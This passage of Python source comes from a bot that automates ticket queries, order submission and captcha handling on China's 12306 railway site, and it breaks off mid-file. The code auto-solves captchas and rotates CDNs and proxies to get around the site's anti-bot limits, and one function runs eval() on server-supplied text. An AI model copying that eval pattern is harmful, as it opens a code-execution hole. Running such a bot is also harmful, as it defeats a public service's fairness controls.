"secretStr=Vgo534nDZiCH8NCvyEPcGepzJoRCjvYr34gKFv5CW1K1XtM6mtKHoiFPjUYvaVKoe06SMhUUpT%2FK%0AxIEIsBD4zHgJPpVyKiTPx80y6OCWhNgcKjib2LLMXMJfgTgh0RKPISjkDjVFmO9p905O%2FegDeKjp%0A1fhIeqCuYraHjNhI0PjQY39BAY4AHLzW0iGgDq8b%2FtpyOY8Td2XfIWNZJCWzgyPkNXOk0HUguB2G%0AKh2T8nlko6zb5ra%2B%2BA%3D%3D&train_date=2018-08-03&back_train_date=2018-08-03&tour_flag=dc&purpose_codes=ADULT&query_from_station_name=深圳&query_to_station_name=长沙&undefined" result1 = so.send(urls=urls["submit_station_url"], data=data) print(result1) # so = socketUtils('183.232.189.31', 80) # result = so.send(url="https://kyfw.12306.cn/passport/web/login", s_data="") # print(result) File: inter/CheckOrderInfo.py # coding=utf-8 from collections import OrderedDict from inter.GetQueueCount import getQueueCount from inter.GetRepeatSubmitToken import getRepeatSubmitToken class checkOrderInfo: def __init__(self, session, train_no, set_type, passengerTicketStrList, oldPassengerStr, station_dates, ticket_peoples): self.train_no = train_no self.set_type = set_type self.passengerTicketStrList = passengerTicketStrList self.oldPassengerStr = oldPassengerStr self.station_dates = station_dates self.ticket_peoples = ticket_peoples self.RepeatSubmitToken = getRepeatSubmitToken(session) self.getTicketInfoForPassengerForm = self.RepeatSubmitToken.sendGetRepeatSubmitToken() self.ticketInfoForPassengerForm = self.getTicketInfoForPassengerForm.get("ticketInfoForPassengerForm", "") self.token = self.getTicketInfoForPassengerForm.get("token", "") self.session = self.getTicketInfoForPassengerForm.get("session", "") def data_par(self): """ 参数结构 :return: """ data = OrderedDict() data['bed_level_order_num'] = "000000000000000000000000000000" data['passengerTicketStr'] = self.passengerTicketStrList.rstrip("_{0}".format(self.set_type)) data['oldPassengerStr'] = self.oldPassengerStr data['tour_flag'] = 'dc' data['randCode'] = "" data['cancel_flag'] = 2 data['_json_att'] = "" data['REPEAT_SUBMIT_TOKEN'] = self.token return data def sendCheckOrderInfo(self): """ 检查支付订单,需要提交REPEAT_SUBMIT_TOKEN passengerTicketStr : 座位编号,0,票类型,乘客名,证件类型,证件号,手机号码,保存常用联系人(Y或N) oldPassengersStr: 乘客名,证件类型,证件号,乘客类型 :return: """ CheckOrderInfoUrls = self.session.urls["checkOrderInfoUrl"] data = self.data_par() checkOrderInfoRep = self.session.httpClint.send(CheckOrderInfoUrls, data) data = checkOrderInfoRep.get("data", {}) if data and data.get("submitStatus", False): print (u'车票提交通过,正在尝试排队') ifShowPassCodeTime = int(checkOrderInfoRep["data"]["ifShowPassCodeTime"]) / float(1000) if "ifShowPassCode" in checkOrderInfoRep["data"] and checkOrderInfoRep["data"]["ifShowPassCode"] == "Y": is_need_code = True elif "ifShowPassCode" in checkOrderInfoRep["data"] and checkOrderInfoRep['data']['submitStatus'] is True: is_need_code = False else: is_need_code = False QueueCount = getQueueCount(self.session, is_need_code, ifShowPassCodeTime, self.set_type, self.station_dates, self.train_no, self.ticket_peoples, self.ticketInfoForPassengerForm, self.token, self.oldPassengerStr, self.passengerTicketStrList, ) QueueCount.sendGetQueueCount() elif "errMsg" in data and data["errMsg"]: print(checkOrderInfoRep['data']["errMsg"]) elif 'messages' in checkOrderInfoRep and checkOrderInfoRep['messages']: print (checkOrderInfoRep['messages'][0]) File: inter/Query.py # coding=utf-8 import copy import random import wrapcache from config import urlConf from config.TicketEnmu import ticket from myUrllib.httpUtils import HTTPClient from config.configCommon import seat_conf_2 import TickerConfig class query: """ 查询接口 """ def __init__(self, selectObj, from_station, to_station, from_station_h, to_station_h, _station_seat, station_trains, ticke_peoples_num, station_dates=None, ): self.session = selectObj self.httpClint = HTTPClient(TickerConfig.IS_PROXY) self.httpClint.set_cookies(self.session.cookies) self.urls = urlConf.urls self.from_station = from_station self.to_station = to_station self.from_station_h = from_station_h self.to_station_h = to_station_h self.station_trains = station_trains self._station_seat = _station_seat if isinstance(_station_seat, list) else list(_station_seat) self.station_dates = station_dates if isinstance(station_dates, list) else list(station_dates) self.ticket_black_list = dict() self.ticke_peoples_num = ticke_peoples_num def station_seat(self, index): """ 获取车票对应坐席 :return: """ seat = {'商务座': 32, '一等座': 31, '二等座': 30, '特等座': 25, '软卧': 23, '硬卧': 28, '硬座': 29, '无座': 26, '动卧': 33, } return seat[index] def check_is_need_train(self, ticket_info): """ 判断车次是否为想要的车次,如果ticket_info为空,那么就不校验车次,直接返回True :param ticket_info: :return: """ if self.station_dates and self.station_trains: return ticket_info[3] in self.station_trains else: return True def sendQuery(self): """ 查询 :return: """ if TickerConfig.IS_CDN == 1 and self.session.cdn_list: self.httpClint.cdn = self.session.cdn_list[random.randint(4, len(self.session.cdn_list) - 1)] for station_date in self.station_dates: select_url = copy.copy(self.urls["select_url"]) select_url["req_url"] = select_url["req_url"].format(station_date, self.from_station, self.to_station, self.session.queryUrl) station_ticket = self.httpClint.send(select_url) value = station_ticket.get("data", "") if not value: print(u'{0}-{1} 车次坐席查询为空,查询url: https://kyfw.12306.cn{2}, 可以手动查询是否有票'.format( self.from_station_h, self.to_station_h, select_url["req_url"])) else: result = value.get('result', []) if result: for i in value['result']: ticket_info = i.split('|') if self.session.flag: print(f"车次:{ticket_info[3]} 出发站:{self.from_station_h} 到达站:{self.to_station_h} 历时:{ticket_info[10]}" f" 商务/特等座:{ticket_info[32] or '--'}" f" 一等座:{ticket_info[31] or '--'}" f" 二等座:{ticket_info[30] or '--'}" f" 动卧:{ticket_info[33] or '--'}" f" 硬卧:{ticket_info[28] or '--'}" f" 软座:{ticket_info[23] or '--'}" f" 硬座:{ticket_info[29] or '--'}" f" 无座:{ticket_info[26] or '--'}" f" {ticket_info[1] or '--'}") if ticket_info[1] == "预订" and self.check_is_need_train(ticket_info): # 筛选未在开始时间内的车次 for j in self._station_seat: is_ticket_pass = ticket_info[j] if ticket_info[11] == "Y": if is_ticket_pass != '' and is_ticket_pass != '无' and is_ticket_pass != '*': # 过滤有效目标车次 secretStr = ticket_info[0] train_no = ticket_info[2] query_from_station_name = ticket_info[6] query_to_station_name = ticket_info[7] train_location = ticket_info[15] stationTrainCode = ticket_info[3] leftTicket = ticket_info[12] start_time = ticket_info[8] arrival_time = ticket_info[9] distance_time = ticket_info[10] print(start_time, arrival_time, distance_time) seat = j try: ticket_num = int(ticket_info[j]) except ValueError: ticket_num = "有" print(u'车次: {0} 始发车站: {1} 终点站: {2} {3}: {4}'.format(ticket_info[3], self.from_station_h, self.to_station_h, seat_conf_2[j], ticket_num)) if seat_conf_2[j] == "无座" and ticket_info[3][0] in ["G", "D", "C"]: seat = 30 # GD开头的无座直接强制改为二等座车次 if wrapcache.get(train_no): print(ticket.QUERY_IN_BLACK_LIST.format(train_no)) continue else: if ticket_num != "有" and self.ticke_peoples_num > ticket_num: if TickerConfig.IS_MORE_TICKET: print( u"余票数小于乘车人数,当前余票数: {}, 删减人车人数到: {}".format(ticket_num, ticket_num)) is_more_ticket_num = ticket_num else: print(u"余票数小于乘车人数,当前设置不提交,放弃此次提交机会") continue else: print(u"设置乘车人数为: {}".format(self.ticke_peoples_num)) is_more_ticket_num = self.ticke_peoples_num print(ticket.QUERY_C) return { "secretStr": secretStr, "train_no": train_no, "stationTrainCode": stationTrainCode, "train_date": station_date, "query_from_station_name": query_from_station_name, "query_to_station_name": query_to_station_name, "seat": seat, "leftTicket": leftTicket, "train_location": train_location, "code": ticket.SUCCESS_CODE, "is_more_ticket_num": is_more_ticket_num, "cdn": self.httpClint.cdn, "status": True, } elif is_ticket_pass == '无' and ticket_info[37] == "1" and TickerConfig.TICKET_TYPE is 2: """ is_ticket_pass如果有别的显示,但是可以候补,可以提issues提出来,附上query log,我将添加上 判断车次是否可以候补 目前的候补机制是只要一有候补位置,立马提交候补 """ # 如果最后一位为1,则是可以候补的,不知道这些正确嘛? nate = list(ticket_info[38]) if wrapcache.get(f"hb{ticket_info[2]}"): continue for set_type in TickerConfig.SET_TYPE: if TickerConfig.PASSENGER_TICKER_STR[set_type] not in nate: if ticket_info[3][0] in ["G", "D", "C"] and set_type in ["一等座", "特等座", "二等座", "商务座", "无座"]: return { "secretList": ticket_info[0], "seat": [set_type], "train_no": ticket_info[2], "status": True, "cdn": self.httpClint.cdn, } elif ticket_info[3][0] in ["T", "Z", "K"] and set_type in ["硬卧", "硬座", "无座", "软座", "软卧"]: return { "secretList": ticket_info[0], "seat": [set_type], "train_no": ticket_info[2], "status": True, "cdn": self.httpClint.cdn, } else: print(u"车次配置信息有误,或者返回数据异常,请检查 {}".format(station_ticket)) self.session.flag = False return {"code": ticket.FAIL_CODE, "status": False, "cdn": self.httpClint.cdn, } if __name__ == "__main__": q = query() File: inter/CheckUser.py # coding=utf-8 import datetime import random import time import wrapcache from config import configCommon from config.TicketEnmu import ticket class checkUser: def __init__(self, session): self.session = session def sendCheckUser(self): """ 检查用户登录, 检查间隔为2分钟 :return: """ CHENK_TIME = 1 while 1: time.sleep(3) # 防止cpu占用过高 configCommon.checkSleepTime(self.session) # 修复晚上查询线程休眠时,检查登录线程为休眠,造成快豆迅速消耗 if wrapcache.get("user_time") is None: check_user_url = self.session.urls["check_user_url"] data = {"_json_att": ""} check_user = self.session.httpClint.send(check_user_url, data) if check_user.get("data", False): check_user_flag = check_user["data"]["flag"] if check_user_flag is True: wrapcache.set("user_time", datetime.datetime.now(), timeout=random.randint(60, 80) * CHENK_TIME) else: if check_user['messages']: print(ticket.LOGIN_SESSION_FAIL.format(check_user['messages'])) self.session.call_login() wrapcache.set("user_time", datetime.datetime.now(), timeout=random.randint(60, 80) * CHENK_TIME) else: print(ticket.LOGIN_SESSION_FAIL.format(check_user['messages'])) self.session.call_login() wrapcache.set("user_time", datetime.datetime.now(), timeout=random.randint(60, 80) * CHENK_TIME) File: inter/LoginConf.py # coding=utf-8 from config.urlConf import urls def loginConf(session): """ 判断登录是否需要验证码 :param session: :return: """ loginConfUrl = urls.get("loginConf") loginConfRsp = session.httpClint.send(urls=loginConfUrl, data={}) if loginConfRsp and loginConfRsp.get("data", {}).get("is_login_passCode") == "N": print(u"不需要验证码") return False else: print(u"需要验证码") return True if __name__ == '__main__': pass File: inter/ConfirmSingleForQueueAsys.py # coding=utf-8 import json import urllib from collections import OrderedDict from inter.QueryOrderWaitTime import queryOrderWaitTime class confirmSingleForQueueAsys: """ 订单快读排队 """ def __init__(self, session, passengerTicketStr, oldPassengerStr, result, randCode="", ): self.session = session self.passengerTicketStr = passengerTicketStr self.oldPassengerStr = oldPassengerStr self.result = result if isinstance(result, str) else str(result) self.randCode = randCode def data_par(self): """ 字段说明 passengerTicketStr 乘客乘车代码 oldPassengerStr 乘客编号代码 randCode 填空 purpose_codes 学生还是成人 key_check_isChange autoSubmitOrderRequest返回的result字段做切割即可 leftTicketStr autoSubmitOrderRequest返回的result字段做切割即可 train_location autoSubmitOrderRequest返回的result字段做切割即可 choose_seats seatDetailType _json_att :return: """ results = self.result.split("#") key_check_isChange = results[1] leftTicketStr = results[2] train_location = results[0] data = OrderedDict() data["passengerTicketStr"] = self.passengerTicketStr data["oldPassengerStr"] = self.oldPassengerStr data["randCode"] = self.randCode data["purpose_codes"] = "ADULT" data["key_check_isChange"] = key_check_isChange data["leftTicketStr"] = leftTicketStr data["train_location"] = train_location data["choose_seats"] = "" data["seatDetailType"] = "" data["_json_att"] = "" return data def sendConfirmSingleForQueueAsys(self): """ 请求订单快读排队接口 :return: """ urls = self.session.urls["confirmSingleForQueueAsys"] data = self.data_par() confirmSingleForQueueAsysResult = self.session.httpClint.send(urls, data) if confirmSingleForQueueAsysResult.get("status", False) and confirmSingleForQueueAsysResult.get("data", False): queueData = confirmSingleForQueueAsysResult.get("data", {}) if queueData.get("submitStatus", False): qwt = queryOrderWaitTime(session=self.session) qwt.sendQueryOrderWaitTime() else: print(queueData.get("errMsg", "")) File: inter/LiftTicketInit.py # coding=utf-8 import re class liftTicketInit: def __init__(self, session): self.session = session def reqLiftTicketInit(self): """ 请求抢票页面 :return: """ urls = self.session.urls["left_ticket_init"] # 获取初始化的结果 result = self.session.httpClint.send(urls) # 用正则表达式查出CLeftTicketUrl的值 matchObj = re.search('var CLeftTicketUrl = \'(.*)\'', result, re.M|re.I); if matchObj: # 如果有值,替换queryUrl self.session.queryUrl = matchObj.group(1) return { "status": True } File: inter/__init__.py File: inter/PassengerInitApi.py import datetime import wrapcache import TickerConfig from config.urlConf import urls from inter.ConfirmHB import confirmHB class passengerInitApi: def __init__(self, session, secretList, tickerNo): """ 获取候补信息 """ self.secretList = secretList self.tickerNo = tickerNo self.session = session def sendPassengerInitApi(self): passengerInitApiRsp = self.session.httpClint.send(urls.get("passengerInitApi")) if not passengerInitApiRsp.get("status"): print("".join(passengerInitApiRsp.get("messages")) or passengerInitApiRsp.get("validateMessages")) return data = passengerInitApiRsp.get("data", {}) jzdhDateE = data.get("jzdhDateE") if not data.get("jzdhHourE"): wrapcache.set(key=f"hb{self.tickerNo}", value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) print(f"获取当前候补日期失败,原因: {data.get('jzdhHourE')}") return jzdhHourE = data.get("jzdhHourE").replace(":", "#") jzdhDate = f"{jzdhDateE}#{jzdhHourE}" print(f"当前候补日期为:{jzdhDateE} {jzdhHourE}") confirm = confirmHB(self.secretList, self.session, self.tickerNo, jzdhDate) confirm.sendChechFace() File: inter/SubmitOrderRequest.py # coding=utf-8 import datetime import urllib from collections import OrderedDict import TickerConfig from config.urlConf import urls from inter.CheckOrderInfo import checkOrderInfo from inter.ConfirmHB import confirmHB from inter.PassengerInitApi import passengerInitApi from myException.ticketIsExitsException import ticketIsExitsException def time(): """ 获取日期 :return: """ today = datetime.date.today() return today.strftime('%Y-%m-%d') class submitOrderRequest: def __init__(self, selectObj, secretStr, from_station, to_station, train_no, set_type, passengerTicketStrList, oldPassengerStr, train_date, ticke_peoples): self.session = selectObj # self.secretStr = secretStr try: self.secretStr = urllib.unquote(secretStr) except AttributeError: self.secretStr = urllib.parse.unquote(secretStr) self.from_station = from_station self.to_station = to_station self.to_station = to_station self.train_no = train_no self.set_type = set_type self.passengerTicketStrList = passengerTicketStrList self.oldPassengerStr = oldPassengerStr self.train_date = train_date self.ticke_peoples = ticke_peoples def data_apr(self): """ :return: """ data = [('secretStr', self.secretStr), # 字符串加密 ('train_date', self.train_date), # 出发时间 ('back_train_date', time()), # 返程时间 ('tour_flag', 'dc'), # 旅途类型 ('purpose_codes', 'ADULT'), # 成人票还是学生票 ('query_from_station_name', TickerConfig.FROM_STATION), # 起始车站 ('query_to_station_name', TickerConfig.TO_STATION), # 终点车站 ('undefined', ''), ] return data def sendSubmitOrderRequest(self): """ 提交车次 预定的请求参数,注意参数顺序 注意这里为了防止secretStr被urllib.parse过度编码,在这里进行一次解码 否则调用HttpTester类的post方法将会将secretStr编码成为无效码,造成提交预定请求失败 :param secretStr: 提交车次加密 :return: """ submit_station_url = self.session.urls["submit_station_url"] submitResult = self.session.httpClint.send(submit_station_url, self.data_apr()) if 'data' in submitResult and submitResult['data']: if submitResult['data'] == 'N': coi = checkOrderInfo(self.session, self.train_no, self.set_type, self.passengerTicketStrList, self.oldPassengerStr, self.train_date, self.ticke_peoples) coi.sendCheckOrderInfo() else: print (u'出票失败') elif 'messages' in submitResult and submitResult['messages']: raise ticketIsExitsException(submitResult['messages'][0]) class submitOrderRequestByAfterNate: def __init__(self, session, secretList, tickerNo): """ 提交候补订单 :param secretList: :param session: """ self.secretList = secretList self.session = session self.tickerNo = tickerNo def data_apr(self): """ secretList 9vqa9%2B%2F%2Fsdozmm22hpSeDTGqRUwSuA2D0r%2BmU%2BLZj7MK7CDuf5Ep1xpxl4Dyxfmoah%2BaB9TZSesU%0AkxBbo5oNgR1vqMfvq66VP0T7tpQtH%2BbVGBz1FolZG8jDD%2FHqnz%2FnvdBP416Og6WGS14O%2F3iBSwT8%0AkRPsNF0Vq0U082g0tlJtP%2BPn7TzW3z7TDCceMJIjFcfEOA%2BW%2BuK%2Bpy6jCQMv0TmlkXf5aKcGnE02%0APuv4I8nF%2BOWjWzv9CrJyiCZiWaXd%2Bi7p69V3a9dhF787UgS660%2BqKRFB4RLwAfic3MkAlfpGWhMY%0ACfARVQ%3D%3D#O| _json_att 候补一次只能补一个座位,默认取TICKET_TYPE第一个 :return: """ ticker = TickerConfig.PASSENGER_TICKER_STR.get(TickerConfig.SET_TYPE[0]) data = OrderedDict() data["secretList"] = f"{self.secretList}#{ticker}|" data["_json_att"] = "" return data def sendSubmitOrderRequest(self, ): submitOrderRequestRsp = self.session.httpClint.send(urls.get("SubmitOrderRequestRsp"), self.data_apr()) if not submitOrderRequestRsp.get("status") or not submitOrderRequestRsp.get("data", {}).get("flag"): print("".join(submitOrderRequestRsp.get("messages")) or submitOrderRequestRsp.get("validateMessages")) return pApi = passengerInitApi(self.session, self.secretList, self.tickerNo) pApi.sendPassengerInitApi() File: inter/ChechFace.py import datetime import urllib from collections import OrderedDict from config.urlConf import urls import TickerConfig from inter.GetSuccessRate import getSuccessRate from myException.ticketConfigException import ticketConfigException import wrapcache class chechFace: def __init__(self, selectObj, secretList, train_no): """ 人脸识别 """ self.secretList = secretList self.session = selectObj self.train_no = train_no def data_apr(self): """ secretList 9vqa9%2B%2F%2Fsdozmm22hpSeDTGqRUwSuA2D0r%2BmU%2BLZj7MK7CDuf5Ep1xpxl4Dyxfmoah%2BaB9TZSesU%0AkxBbo5oNgR1vqMfvq66VP0T7tpQtH%2BbVGBz1FolZG8jDD%2FHqnz%2FnvdBP416Og6WGS14O%2F3iBSwT8%0AkRPsNF0Vq0U082g0tlJtP%2BPn7TzW3z7TDCceMJIjFcfEOA%2BW%2BuK%2Bpy6jCQMv0TmlkXf5aKcGnE02%0APuv4I8nF%2BOWjWzv9CrJyiCZiWaXd%2Bi7p69V3a9dhF787UgS660%2BqKRFB4RLwAfic3MkAlfpGWhMY%0ACfARVQ%3D%3D#O| _json_att 候补一次只能补一个座位,默认取TICKET_TYPE第一个 :return: """ ticker = TickerConfig.PASSENGER_TICKER_STR.get(TickerConfig.SET_TYPE[0]) data = OrderedDict() data["secretList"] = f"{self.secretList}#{ticker}|" data["_json_att"] = "" return data def sendChechFace(self): chechFaceRsp = self.session.httpClint.send(urls.get("chechFace"), self.data_apr()) if not chechFaceRsp.get("status"): print("".join(chechFaceRsp.get("messages")) or chechFaceRsp.get("validateMessages")) wrapcache.set(key=f"hb{self.train_no}", value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) return data = chechFaceRsp["data"] if not data.get("face_flag"): print("".join(chechFaceRsp.get("messages")) or chechFaceRsp.get("validateMessages")) if data.get("face_check_code") == "14": """ 未通过人脸核验 """ raise ticketConfigException("通过人证一致性核验的用户及激活的“铁路畅行”会员可以提交候补需求,请您按照操作说明在铁路12306app.上完成人证核验") elif data.get("face_check_code") in ["12", "02"]: """ 系统忙,请稍后再试! """ print("系统忙,请稍后再试!") wrapcache.set(key=f"hb{self.train_no}", value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) elif data.get("face_check_code") in ["03", "13"]: """ 证件信息审核失败,请检查所填写的身份信息内容与原证件是否一致。 """ raise ticketConfigException("证件信息审核失败,请检查所填写的身份信息内容与原证件是否一致。") elif data.get("face_check_code") in ["01", "11"]: """ 证件信息正在审核中,请您耐心等待,审核通过后可继续完成候补操作。 """ print("证件信息正在审核中,请您耐心等待,审核通过后可继续完成候补操作。") wrapcache.set(key=f"hb{self.train_no}", value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) g = getSuccessRate(self.session, self.secretList) g.sendSuccessRate() File: inter/ConfirmSingleForQueue.py # coding=utf-8 import datetime import time from inter.CheckRandCodeAnsyn import checkRandCodeAnsyn from inter.GetPassengerDTOs import getPassengerDTOs from inter.GetRandCode import getRandCode from inter.QueryOrderWaitTime import queryOrderWaitTime class confirmSingleForQueue: def __init__(self, session, ifShowPassCodeTime, is_node_code, token, set_type, ticket_peoples, ticketInfoForPassengerForm, oldPassengerStr, passengerTicketStrList): self.session = session self.ifShowPassCodeTime = ifShowPassCodeTime self.is_node_code = is_node_code self.token = token self.set_type = set_type self.ticket_peoples = ticket_peoples self.ticketInfoForPassengerForm = ticketInfoForPassengerForm self.passengerTicketStrList = passengerTicketStrList self.oldPassengerStr = oldPassengerStr def data_par(self): """ 模拟提交订单是确认按钮,参数获取方法还是get_ticketInfoForPassengerForm 中获取 :return: """ if not self.passengerTicketStrList and not self.oldPassengerStr: s = getPassengerDTOs(session=self.session, ticket_peoples=self.ticket_peoples, set_type=self.set_type) getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr() if getPassengerDTOsResult.get("status", False): self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "") self.oldPassengerStr = getPassengerDTOsResult.get("oldPassengerStr", "") data = { "passengerTicketStr": self.passengerTicketStrList.rstrip("_{0}".format(self.set_type)), "oldPassengerStr": "".join(self.oldPassengerStr), "purpose_codes": self.ticketInfoForPassengerForm["purpose_codes"], "key_check_isChange": self.ticketInfoForPassengerForm["key_check_isChange"], "leftTicketStr": self.ticketInfoForPassengerForm["leftTicketStr"], "train_location": self.ticketInfoForPassengerForm["train_location"], "seatDetailType": "", # 开始需要选择座位,但是目前12306不支持自动选择作为,那这个参数为默认 "roomType": "00", # 好像是根据一个id来判断选中的,两种 第一种是00,第二种是10,但是我在12306的页面没找到该id,目前写死是00,不知道会出什么错 "dwAll": "N", "whatsSelect": 1, "_json_at": "", "randCode": "", "choose_seats": "", "REPEAT_SUBMIT_TOKEN": self.token, } return data def sendConfirmSingleForQueue(self): """ # 模拟查询当前的列车排队人数的方法 # 返回信息组成的提示字符串 :return: """ data = self.data_par() checkQueueOrderUrl = self.session.urls["checkQueueOrderUrl"] try: if self.is_node_code: print(u"正在使用自动识别验证码功能") for i in range(3): randCode = getRandCode(is_auto_code=True, auto_code_type=2) checkcode = checkRandCodeAnsyn(self.session, randCode, self.token) if checkcode == 'TRUE': print(u"验证码通过,正在提交订单") data['randCode'] = randCode break else: print (u"验证码有误, {0}次尝试重试".format(i + 1)) print(u"验证码超过限定次数3次,放弃此次订票机会!") else: print(u"不需要验证码") time.sleep(self.ifShowPassCodeTime) checkQueueOrderResult = self.session.httpClint.send(checkQueueOrderUrl, data) if "status" in checkQueueOrderResult and checkQueueOrderResult["status"]: c_data = checkQueueOrderResult["data"] if "data" in checkQueueOrderResult else {} if 'submitStatus' in c_data and c_data['submitStatus'] is True: qow = queryOrderWaitTime(self.session) qow.sendQueryOrderWaitTime() else: if 'errMsg' in c_data and c_data['errMsg']: print(u"提交订单失败,{0}".format(c_data['errMsg'])) else: print(c_data) print(u'订票失败!很抱歉,请重试提交预订功能!') elif "messages" in checkQueueOrderResult and checkQueueOrderResult["messages"]: print(u"提交订单失败,错误信息: " + checkQueueOrderResult["messages"]) else: print(u"提交订单中,请耐心等待:" + checkQueueOrderResult["message"]) except ValueError: print(u"接口 {} 无响应".format(checkQueueOrderUrl)) File: inter/QueryOrderWaitTime.py # coding=utf-8 import copy import time from config.TicketEnmu import ticket from config.emailConf import sendEmail from config.serverchanConf import sendServerChan from myException.ticketIsExitsException import ticketIsExitsException from myException.ticketNumOutException import ticketNumOutException class queryOrderWaitTime: """ 排队 """ def __init__(self, session): self.session = session def sendQueryOrderWaitTime(self): """ 排队获取订单等待信息,每隔3秒请求一次,最高请求次数为20次! :return: """ num = 1 while True: num += 1 if num > ticket.OUT_NUM: print(ticket.WAIT_OUT_NUM) order_id = self.queryMyOrderNoComplete() # 排队失败,自动取消排队订单 if order_id: self.cancelNoCompleteMyOrder(order_id) break try: queryOrderWaitTimeUrl = copy.deepcopy(self.session.urls["queryOrderWaitTimeUrl"]) queryOrderWaitTimeUrl["req_url"] = queryOrderWaitTimeUrl["req_url"].format(int(round(time.time() * 1000))) queryOrderWaitTimeResult = self.session.httpClint.send(queryOrderWaitTimeUrl) except ValueError: queryOrderWaitTimeResult = {} if queryOrderWaitTimeResult: if queryOrderWaitTimeResult.get("status", False): data = queryOrderWaitTimeResult.get("data", False) if data and data.get("orderId", ""): sendEmail(ticket.WAIT_ORDER_SUCCESS.format( data.get("orderId", ""))) sendServerChan(ticket.WAIT_ORDER_SUCCESS.format( data.get("orderId", ""))) raise ticketIsExitsException(ticket.WAIT_ORDER_SUCCESS.format( data.get("orderId"))) elif data.get("msg", False): print(data.get("msg", "")) break elif data.get("waitTime", False): print(ticket.WAIT_ORDER_CONTINUE.format(0 - data.get("waitTime", False))) else: pass elif queryOrderWaitTimeResult.get("messages", False): print(ticket.WAIT_ORDER_FAIL.format(queryOrderWaitTimeResult.get("messages", ""))) else: print(ticket.WAIT_ORDER_NUM.format(num + 1)) else: pass time.sleep(2) else: print(ticketNumOutException(ticket.WAIT_ORDER_SUB_FAIL)) def queryMyOrderNoComplete(self): """ 获取订单列表信息 :return: """ self.initNoComplete() queryMyOrderNoCompleteUrl = self.session.urls["queryMyOrderNoCompleteUrl"] data = {"_json_att": ""} try: queryMyOrderNoCompleteResult = self.session.httpClint.send(queryMyOrderNoCompleteUrl, data) except ValueError: queryMyOrderNoCompleteResult = {} if queryMyOrderNoCompleteResult: if queryMyOrderNoCompleteResult.get("data", False) and queryMyOrderNoCompleteResult["data"].get("orderDBList", False): return queryMyOrderNoCompleteResult["data"] elif queryMyOrderNoCompleteResult.get("data", False) and queryMyOrderNoCompleteResult["data"].get("orderCacheDTO", False): if queryMyOrderNoCompleteResult["data"]["orderCacheDTO"].get("message", False): print(queryMyOrderNoCompleteResult["data"]["orderCacheDTO"]["message"]["message"]) raise ticketNumOutException( queryMyOrderNoCompleteResult["data"]["orderCacheDTO"]["message"]["message"]) else: if queryMyOrderNoCompleteResult.get("message", False): print(queryMyOrderNoCompleteResult.get("message", False)) return False else: return False else: return False def initNoComplete(self): """ 获取订单前需要进入订单列表页,获取订单列表页session :return: """ initNoCompleteUrl = self.session.urls["initNoCompleteUrl"] data = {"_json_att": ""} self.session.httpClint.send(initNoCompleteUrl, data) def cancelNoCompleteMyOrder(self, sequence_no): """ 取消订单 :param sequence_no: 订单编号 :return: """ cancelNoCompleteMyOrderUrl = self.session.urls["cancelNoCompleteMyOrder"] cancelNoCompleteMyOrderData = { "sequence_no": sequence_no, "cancel_flag": "cancel_order", "_json_att": "" } cancelNoCompleteMyOrderResult = self.session.httpClint.send(cancelNoCompleteMyOrderUrl, cancelNoCompleteMyOrderData) if cancelNoCompleteMyOrderResult.get("data", False) and cancelNoCompleteMyOrderResult["data"].get("existError", "N"): print(ticket.CANCEL_ORDER_SUCCESS.format(sequence_no)) time.sleep(2) return True else: print(ticket.CANCEL_ORDER_FAIL.format(sequence_no)) return False File: inter/GetRepeatSubmitToken.py # coding=utf-8 import json import re class getRepeatSubmitToken: def __init__(self, session): self.session = session def sendGetRepeatSubmitToken(self): """ 获取提交车票请求token :return: token """ initdc_url = self.session.urls["initdc_url"] initdc_result = self.session.httpClint.send(initdc_url, ) token_name = re.compile(r"var globalRepeatSubmitToken = '(\S+)'") ticketInfoForPassengerForm_name = re.compile(r'var ticketInfoForPassengerForm=(\{.+\})?') order_request_params_name = re.compile(r'var orderRequestDTO=(\{.+\})?') token = re.search(token_name, initdc_result).group(1) re_tfpf = re.findall(ticketInfoForPassengerForm_name, initdc_result) re_orp = re.findall(order_request_params_name, initdc_result) if re_tfpf: ticketInfoForPassengerForm = json.loads(re_tfpf[0].replace("'", '"')) else: ticketInfoForPassengerForm = "" if re_orp: order_request_params = json.loads(re_orp[0].replace("'", '"')) else: order_request_params = "" return { "token": token, "ticketInfoForPassengerForm": ticketInfoForPassengerForm, "order_request_params": order_request_params, "session": self.session } File: inter/GetPassCodeNewOrderAndLogin.py # coding=utf-8 import base64 import copy import random def getPassCodeNewOrderAndLogin(session, imgType): """ 下载验证码 :param session: :param imgType: 下载验证码类型,login=登录验证码,其余为订单验证码 :return: """ if imgType == "login": codeImgUrl = copy.deepcopy(session.urls["getCodeImg"]) codeImgUrl["req_url"] = codeImgUrl["req_url"].format(random.random()) else: codeImgUrl = copy.deepcopy(session.urls["codeImgByOrder"]) codeImgUrl["req_url"] = codeImgUrl["req_url"].format(random.random()) print(u"下载验证码...") img_path = './tkcode.png' result = session.httpClint.send(codeImgUrl) try: if isinstance(result, dict): print(u"下载验证码失败, 请手动检查是否ip被封,或者重试,请求地址:https://kyfw.12306.cn{}".format(codeImgUrl.get("req_url"))) return False else: print(u"下载验证码成功") try: with open(img_path, 'wb', encoding="utf-8") as img: img.write(result) except Exception: with open(img_path, 'wb') as img: img.write(result) return result except OSError: print(u"验证码下载失败,可能ip被封,确认请手动请求: {0}".format(codeImgUrl)) def getPassCodeNewOrderAndLogin1(session, imgType): """ 获取验证码2 :param session: :param imgType: :return: """ if imgType == "login": codeImgUrl = copy.deepcopy(session.urls["getCodeImg1"]) codeImgUrl["req_url"] = codeImgUrl["req_url"].format(random.random()) else: codeImgUrl = copy.deepcopy(session.urls["codeImgByOrder"]) codeImgUrl["req_url"] = codeImgUrl["req_url"].format(random.random()) print(u"下载验证码...") img_path = './tkcode.png' codeImgUrlRsp = session.httpClint.send(codeImgUrl) if not isinstance(codeImgUrlRsp, str): print("验证码获取失败") return result = eval(codeImgUrlRsp.split("(")[1].split(")")[0]).get("image") try: if isinstance(result, dict): print(u"下载验证码失败, 请手动检查是否ip被封,或者重试,请求地址:https://kyfw.12306.cn{}".format(codeImgUrl.get("req_url"))) return False else: print(u"下载验证码成功") try: with open(img_path, 'wb', encoding="utf-8") as img: img.write(result) except Exception: with open(img_path, 